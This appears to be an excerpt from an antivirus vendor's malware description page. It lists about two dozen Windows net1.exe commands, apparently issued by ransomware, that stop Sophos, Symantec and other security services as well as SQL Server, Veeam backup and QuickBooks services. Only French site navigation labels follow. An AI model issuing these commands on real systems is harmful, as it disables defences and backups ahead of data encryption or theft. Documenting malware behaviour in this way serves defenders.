'%WINDIR%\syswow64\net1.exe' stop ReportServer$SQL_2008 /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$TPS /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Clean Service” /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos File Scanner Service” /y
'%WINDIR%\syswow64\net1.exe' stop “aphidmonitorservice” /y
'%WINDIR%\syswow64\net1.exe' stop MSOLAP$TPS /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Health Service” /y
'%WINDIR%\syswow64\net1.exe' stop MSOLAP$SYSTEM_BGC /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos MCS Agent” /y
'%WINDIR%\syswow64\net1.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net1.exe' stop stc_raw_agent /y
'%WINDIR%\syswow64\net1.exe' stop ReportServer$TPSAMA /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$SOPHOS /y
'%WINDIR%\syswow64\net1.exe' stop YooIT /y
'%WINDIR%\syswow64\net1.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\net1.exe' stop RTVscan /y
'%WINDIR%\syswow64\net1.exe' stop SavRoam /y
'%WINDIR%\syswow64\net1.exe' stop QBIDPService /y
'%WINDIR%\syswow64\net1.exe' stop SepMasterService /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$TPS /y
'%WINDIR%\syswow64\net1.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net1.exe' start SSDPSRV /y
'%WINDIR%\syswow64\net1.exe' stop UI0Detect /y
'%WINDIR%\syswow64\net1.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net1.exe' stop SAVAdminService /y

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial